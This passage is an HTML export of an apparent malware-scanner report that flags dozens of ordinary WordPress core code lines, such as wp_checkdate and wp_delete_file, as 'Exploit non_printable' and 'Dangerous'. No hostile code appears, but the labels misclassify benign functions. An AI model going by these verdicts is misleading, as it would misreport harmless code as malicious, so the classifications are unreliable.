<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'] . "('" . str_replace( </span><span style="color: #0000BB">$truncate_paths</span><span style="color: #DD0000">, '', wp_normalize_path( </span><span style="color: #0000BB">$filename</span><span style="color: #DD0000"> ) ) . "')";</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7258</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">array_reverse</span><span style="color: #007700">( </span><span style="color: #0000BB">$caller </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$caller</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7277</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">[] Array </span><span style="color: #0000BB">of IDs not present in the cache</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_get_non_cached_ids</span><span style="color: #007700">( </span><span style="color: #0000BB">$object_ids</span><span style="color: #007700">, </span><span style="color: #0000BB">$cache_group </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7296</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$non_cached_ids</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 729</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">( </span><span style="color: #DD0000">"/^</span><span style="color: #007700">{</span><span style="color: #0000BB">$token</span><span style="color: #007700">}</span><span style="color: #DD0000">:[0-9.E+-]+;</span><span style="color: #0000BB">$end</span><span style="color: #DD0000">/"</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the given $object_id is a valid cache ID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_validate_cache_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$object_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the device is able to upload files</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_device_can_upload</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">( </span><span style="color: #DD0000">'#OS ([\d_]+) like Mac OS X#'</span><span style="color: #007700">, </span><span style="color: #0000BB">$ua</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">) && </span><span style="color: #0000BB">version_compare</span><span style="color: #007700">( </span><span style="color: #0000BB">$version</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">], </span><span style="color: #DD0000">'6'</span><span style="color: #007700">, </span><span style="color: #DD0000">'>=' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">the path is a stream URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7359</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_stream</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$stream</span><span style="color: #007700">, </span><span style="color: #0000BB">stream_get_wrappers</span><span style="color: #007700">(), </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">checkdate</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">valid date</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">not valid date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_checkdate</span><span style="color: #007700">( </span><span style="color: #0000BB">$month</span><span style="color: #007700">, </span><span style="color: #0000BB">$day</span><span style="color: #007700">, </span><span style="color: #0000BB">$year</span><span style="color: #007700">, </span><span style="color: #0000BB">$source_date </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_checkdate'</span><span style="color: #007700">, </span><span style="color: #0000BB">checkdate</span><span style="color: #007700">( </span><span style="color: #0000BB">$month</span><span style="color: #007700">, </span><span style="color: #0000BB">$day</span><span style="color: #007700">, </span><span style="color: #0000BB">$year </span><span style="color: #007700">), </span><span style="color: #0000BB">$source_date </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7408</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_auth_check_load</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 740</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool False </span><span style="color: #007700">if </span><span style="color: #0000BB">not a serialized string</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">if </span><span style="color: #0000BB">it is</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_serialized_string</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_auth_check_html</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">to this page</span><span style="color: #007700">.</span><span style="color: #DD0000">' ); ?></p></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The Heartbeat response with </span><span style="color: #DD0000">'wp-auth-check' </span><span style="color: #0000BB">value set</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_auth_check</span><span style="color: #007700">( </span><span style="color: #0000BB">$response </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7516</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns RegEx body to liberally match an opening HTML tag</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Tag RegEx</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_tag_regex</span><span style="color: #007700">( </span><span style="color: #0000BB">$tag </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7566</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the slug represents the UTF</span><span style="color: #007700">-</span><span style="color: #0000BB">8 encoding</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_utf8_charset</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_charset </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_is_utf8_charset</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_charset </span><span style="color: #007700">?? </span><span style="color: #0000BB">get_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'blog_charset' </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7574</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions such </span><span style="color: #007700">as </span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">() and </span><span style="color: #0000BB">charset HTML attributes</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The canonical form of the charset</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_canonical_charset</span><span style="color: #007700">( </span><span style="color: #0000BB">$charset </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7586</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'ISO-8859-1'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$charset</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions respect the utf8 characters</span><span style="color: #007700">, </span><span style="color: #0000BB">causing binary data</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">incorrect lengths</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">overrides the mbstring encoding to a binary</span><span style="color: #007700">-</span><span style="color: #0000BB">safe encoding</span><span style="color: #007700">, and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7620</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">however each</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mbstring_binary_safe_encoding</span><span style="color: #007700">( </span><span style="color: #0000BB">$reset </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7636</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'mb_internal_encoding' </span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7668</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">reset_mbstring_encoding</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the value is validated</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_validate_boolean</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">$value</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value was added</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7701</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_delete_file</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7714</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">unlink</span><span style="color: #007700">( </span><span style="color: #0000BB">$delete </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7729</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
